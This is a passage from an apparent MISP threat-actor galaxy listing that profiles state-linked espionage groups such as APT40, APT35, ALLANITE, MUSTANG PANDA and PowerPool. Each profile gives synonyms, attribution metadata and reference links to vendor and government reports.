- https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-freemilk-highly-targeted-spear-phishing-campaign/ - webarchive
- https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://attack.mitre.org/groups/G0067/ - webarchive
- https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/ - webarchive
- https://securelist.com/operation-daybreak/75100/ - webarchive
- https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ - webarchive
- https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/moldypisces/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['Republic of Korea', 'Japan', 'Vietnam'] |
cfr-target-category | ['Government', 'Private sector'] |
country | KP |
Related clusters
To see the related clusters, click here.
APT40
Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT40.
Known Synonyms |
---|
ATK29 |
BRONZE MOHAWK |
G0065 |
GADOLINIUM |
Gingham Typhoon |
ISLANDDREAMS |
ITG09 |
KRYPTONITE PANDA |
Leviathan |
MUDCARP |
Red Ladon |
TA423 |
TEMP.Jumper |
TEMP.Periscope |
Internal MISP references
UUID 5b4b6980-3bc7-11e8-84d6-879aaac37dd9
which can be used as unique global reference for APT40
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-40 - webarchive
- https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html - webarchive
- https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html - webarchive
- https://attack.mitre.org/groups/G0065/ - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company - webarchive
- https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu - webarchive
- https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network - webarchive
- https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding - webarchive
- https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://www.mycert.org.my/portal/advisory?id=MA-774.022020 - webarchive
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign - webarchive
- https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ - webarchive
- https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion - webarchive
- https://www.justice.gov/opa/press-release/file/1412916/download - webarchive
- https://www.justice.gov/opa/press-release/file/1412921/download - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-200a - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-200b - webarchive
- https://www.canada.ca/en/global-affairs/news/2021/07/statement-on-chinas-cyber-campaigns.html - webarchive
- https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://www.mofa.go.jp/press/danwa/press6e_000312.html - webarchive
- https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea - webarchive
- https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf - webarchive
- https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Hong Kong', 'The Philippines', 'Asia Pacific Economic Cooperation', 'Cambodia', 'Belgium', 'Germany', 'Philippines', 'Malaysia', 'Norway', 'Saudi Arabia', 'Switzerland', 'United Kingdom'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT35
FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and the Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT35.
Known Synonyms |
---|
COBALT MIRAGE |
G0059 |
Magic Hound |
Mint Sandstorm |
Newscaster Team |
Phosphorus |
TunnelVision |
Internal MISP references
UUID b8967b3c-3bc9-11e8-8701-8b1ead8c099e
which can be used as unique global reference for APT35
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - webarchive
- https://attack.mitre.org/groups/G0059/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/magic-hound - webarchive
- https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/ - webarchive
- https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html - webarchive
- https://www.cfr.org/cyber-operations/apt-35 - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ - webarchive
- https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ - webarchive
- https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Related clusters
To see the related clusters, click here.
Orangeworm
Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations that operate within the healthcare sector in the United States, Europe, and Asia. First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims. Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage.
Internal MISP references
UUID 35d71626-4794-11e8-b74d-bbcbe48fee3c
which can be used as unique global reference for Orangeworm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ALLANITE
Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ALLANITE.
Known Synonyms |
---|
Allanite |
Palmetto Fusion |
Internal MISP references
UUID a9000eaf-2b75-4ec7-8dcf-fe1bb5c77470
which can be used as unique global reference for ALLANITE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
capabilities | Powershell scripts, THC Hydra, SecretsDump, Inveigh, PSExec |
mode-of-operation | Watering-hole and phishing leading to ICS recon and screenshot collection |
since | 2017 |
victimology | Electric utilities, US and UK |
Related clusters
To see the related clusters, click here.
CHRYSENE
Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CHRYSENE.
Known Synonyms |
---|
Greenbug |
OilRig |
Internal MISP references
UUID a0082cfa-32e2-42b8-92d8-5c7a7409dcf1
which can be used as unique global reference for CHRYSENE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
capabilities | Watering holes, 64-bit malware, covert C2 via IPv6 DNS, ISMDOOR |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Iraq', 'United Kingdom', 'Pakistan', 'Israel'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
mode-of-operation | IT compromise, information gathering and recon against industrial orgs |
since | 2017 |
victimology | Oil and Gas, Manufacturing, Europe, MENA, North America |
Related clusters
To see the related clusters, click here.
ZooPark
ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.
Internal MISP references
UUID 4defbf2e-4f73-11e8-807f-578d61da7568
which can be used as unique global reference for ZooPark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RANCOR
The Rancor group’s attacks use two primary malware families which are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to Singapore and Cambodia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RANCOR.
Known Synonyms |
---|
G0075 |
Rancor |
Rancor Group |
Rancor Taurus |
Rancor group |
Internal MISP references
UUID 79c7c7e0-79d5-11e8-9b9c-1ff96be20c0b
which can be used as unique global reference for RANCOR
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/rancor - webarchive
- https://attack.mitre.org/groups/G0075/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/rancortaurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Singapore', 'Cambodia'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
The Big Bang
While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.
Internal MISP references
UUID a3cc5105-3bc6-498b-8d53-981e12d86909
which can be used as unique global reference for The Big Bang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
The Gorgon Group
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular The Gorgon Group.
Known Synonyms |
---|
ATK92 |
G0078 |
Gorgon Group |
Pasty Gemini |
Subaat |
Internal MISP references
UUID e47c2c4d-706b-4098-92a2-b93e7103e131
which can be used as unique global reference for The Gorgon Group
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/ - webarchive
- https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/ - webarchive
- https://attack.mitre.org/groups/G0078/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/pastygemini/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
DarkHydrus
In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkHydrus.
Known Synonyms |
---|
G0079 |
LazyMeerkat |
Obscure Serpens |
Internal MISP references
UUID ce2c2dfd-2445-4fbc-a747-9e7092e383f9
which can be used as unique global reference for DarkHydrus
in MISP communities and other software using the MISP galaxy
External references
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/ - webarchive
- https://mobile.twitter.com/360TIC/status/1083289987339042817 - webarchive
- https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/ - webarchive
- https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/ - webarchive
- https://attack.mitre.org/groups/G0079/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
RedAlpha
Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlpha.
Known Synonyms |
---|
DeepCliff |
Red Dev 3 |
Internal MISP references
UUID 71a3b962-9a36-11e8-88f8-b31d20c6fa2a
which can be used as unique global reference for RedAlpha
in MISP communities and other software using the MISP galaxy
External references
- https://www.recordedfuture.com/chinese-cyberespionage-operations - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2018-0626.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
TempTick
This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un
Internal MISP references
UUID 3f3ff6de-a6a7-11e8-92b4-3743eb1c7762
which can be used as unique global reference for TempTick
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['South Korea', 'Japan'] |
cfr-target-category | ['Government', 'Private sector'] |
country | CN |
Operation Parliament
This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.
Internal MISP references
UUID e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d
which can be used as unique global reference for Operation Parliament
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Palestine', 'United Arab Emirates', 'Qatar', 'Somalia', 'Syria', 'Canada', 'Germany', 'Serbia', 'Kuwait', 'Egypt', 'Saudi Arabia', 'Chile', 'Iraq', 'India', 'United States', 'Israel', 'Russia', 'South Korea', 'Jordan', 'Djibouti', 'Lebonon', 'Morocco', 'Iran', 'United Kingdom', 'Afghanistan', 'Oman', 'Denmark'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
Inception Framework
This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Inception Framework.
Known Synonyms |
---|
ATK116 |
Blue Odin |
Clean Ursa |
Cloud Atlas |
G0100 |
OXYGEN |
Internal MISP references
UUID 71ef51ca-a791-11e8-a026-07980ca910ca
which can be used as unique global reference for Inception Framework
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/inception-framework - webarchive
- https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Inception_APT_Analysis_Bluecoat.pdf - webarchive
- https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/bcs_wp_InceptionReport_EN_v12914.pdf - webarchive
- https://securelist.com/the-red-october-campaign/57647 - webarchive
- https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740 - webarchive
- https://securelist.com/red-october-part-two-the-modules/57645 - webarchive
- https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083 - webarchive
- https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899 - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016 - webarchive
- https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies - webarchive
- https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa - webarchive
- https://www.cfr.org/interactive/cyber-operations/cloud-atlas - webarchive
- https://www.cfr.org/cyber-operations/red-october - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Afghanistan', 'Armenia', 'Azerbaijan', 'Belarus', 'Belgium', 'Czech Republic', 'Greece', 'India', 'Iran', 'Italy', 'Kazakhstan', 'Kenya', 'Malaysia', 'Russia', 'South Africa', 'Suriname', 'Turkmenistan', 'Ukraine', 'United Kingdom', 'United States', 'Vietnam'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
HenBox
This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.
Internal MISP references
UUID 36ee04f4-a9df-11e8-b92b-d7ddfd3a8896
which can be used as unique global reference for HenBox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Uighurs'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
MUSTANG PANDA
This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes. In April 2017, CrowdStrike Falcon Intelligence observed a previously unattributed actor group with a Chinese nexus targeting a U.S.-based think tank. Further analysis revealed a wider campaign with unique tactics, techniques, and procedures (TTPs). This adversary targets non-governmental organizations (NGOs) in general, but uses Mongolian language decoys and themes, suggesting this actor has a specific focus on gathering intelligence on Mongolia. These campaigns involve the use of shared malware like Poison Ivy or PlugX. Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MUSTANG PANDA.
Known Synonyms |
---|
BASIN |
BRONZE PRESIDENT |
Earth Preta |
HoneyMyte |
LuminousMoth |
Polaris |
Red Lich |
Stately Taurus |
TA416 |
TANTALUM |
TEMP.HEX |
Twill Typhoon |
Internal MISP references
UUID 78bf726c-a9e6-11e8-9e43-77249a2f7339
which can be used as unique global reference for MUSTANG PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/mustang-panda - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-president - webarchive
- https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW - webarchive
- https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf - webarchive
- https://thecyberwire.com/podcasts/microsoft-threat-intelligence/4/notes - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Germany'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
Thrip
This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Thrip.
Known Synonyms |
---|
ATK78 |
G0076 |
Internal MISP references
UUID 98be4300-a9ef-11e8-9a95-bb9221083cfc
which can be used as unique global reference for Thrip
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/thrip - webarchive
- https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - webarchive
- https://attack.mitre.org/groups/G0076/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
Stealth Mango and Tangelo
This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.
Internal MISP references
UUID f82b352e-a9f8-11e8-8be8-fbcf6eddd58c
which can be used as unique global reference for Stealth Mango and Tangelo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Pakistan |
cfr-suspected-victims | ['Pakistan', 'Iraq', 'Australia', 'Afghanistan', 'United Arab Emirates', 'Germany', 'India', 'United States'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | PK |
PowerPool
Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.
A security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler.
More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user's permissions, allowing write privileges on files in C:\Windows\Task.
The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.
A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.
The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.
The researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PowerPool.
Known Synonyms |
---|
IAmTheKing |
Internal MISP references
UUID abd89986-b1b0-11e8-b857-efe290264006
which can be used as unique global reference for PowerPool
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bahamut
Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.
Internal MISP references
UUID dc3edacc-bb24-11e8-81fb-8c16458922a7
which can be used as unique global reference for Bahamut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Iron Group
Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Iron Group.
Known Synonyms |
---|
Iron Cyber Group |
Internal MISP references
UUID 6a0ea861-229a-45a6-98f5-228f69b43905
which can be used as unique global reference for Iron Group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation BugDrop
This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.
Internal MISP references
UUID 75ae52b2-bca3-11e8-af90-a78f33eee6c1
which can be used as unique global reference for Operation BugDrop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Ukraine', 'Austria', 'Russia', 'Saudi Arabia'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
Unnamed Actor
